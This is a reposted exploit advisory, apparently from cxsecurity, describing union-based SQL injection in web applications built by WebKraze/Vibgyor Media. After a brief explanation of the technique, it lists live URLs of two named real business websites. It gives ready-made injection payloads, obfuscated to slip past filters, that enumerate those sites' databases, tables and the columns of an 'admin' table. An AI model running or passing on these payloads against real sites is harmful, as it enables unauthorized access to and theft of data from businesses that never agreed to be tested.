2025-1-9 22:23:7 Author: cxsecurity.com(查看原文) 阅读量:2 收藏
WebKraze,Vibgyor Media Web Application Union-based Sql Injection
# Exploit Title: WebKraze,Vibgyor Media Web Application Union-based Sql Injection # Date: 2024-12-25 # Exploit Author: Parastou Razi # Contact: [email protected] #Category:webapps #Tested On: Windows, Firefox Proof of Concept: 1. Description: When an application is vulnerable to SQL injection, and the results of the query are returned within the application's responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack. Union-based SQLi – the attacker uses the UNION operator to combine a benign SQL statement with a malicious statement. The malicious statement must use the same columns and data types as the original statement. A vulnerable database processes the combined statement and executes the malicious code. [+] For UNION-Based Sql Injection first add "'" to the end of the link and page information will change : https://www.alikhalafforklifts.com/products.php?id=22 https://www.alikhalafforklifts.com/products.php?id=22' https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093 https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093' 2. Proof #Demo 1: https://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!froM*/information_schema.schemata%23--+ http://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22vibgyorm_alikhalif%22%23--+ #Demo2: https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,database(),17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.schemata--+ https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22wwwwegoc_atforsure%22--+ https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.columns%20WHERE%20table_name=%22admin%22%23
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh